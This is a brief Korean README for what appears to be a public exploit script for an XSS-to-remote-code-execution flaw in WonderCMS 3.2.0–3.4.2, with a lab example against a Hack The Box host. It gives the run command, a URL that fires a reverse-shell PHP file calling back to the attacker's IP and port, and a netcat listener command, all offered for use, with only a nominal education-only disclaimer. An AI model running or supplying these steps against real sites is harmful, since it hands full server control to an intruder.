
XSS 인젝션, WonderCMS 3.2.0 -3.4.2
WonderCMS v3.2.0 ~ v3.4.2는 취약합니다. 원격 공격자는 XSS(Cross-Site Scripting) 익스플로잇을 사용하여 서버를 완전히 장악할 수 있습니다(교육 목적으로만 사용). 작동 방식은 다음과 같습니다:
이 익스플로잇은 WonderCMS의 installModule 구성 요소를 악용하여 임의 코드를 실행하는 교묘한 스크립트를 몰래 주입합니다.
python3 exploit.py <URL> <YOUR_IP> <YOUR_PORT>
예시
python3 exploit.py http://sea.htb/loginURL 10.10.14.20 1234
리버스 셸이 자동으로 트리거되지 않으면 다음 주소로 직접 이동하세요:
http://<TARGET_URL>/themes/revshell-main/rev.php?lhost=<YOUR_IP>&lport=<YOUR_PORT>
다음 명령을 사용하여 리스너를 시작하는 것을 잊지 마세요:
nc -lvp 4444
취약점을 발견하고 보고해 준 prodigiousMind에게 감사드립니다 https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413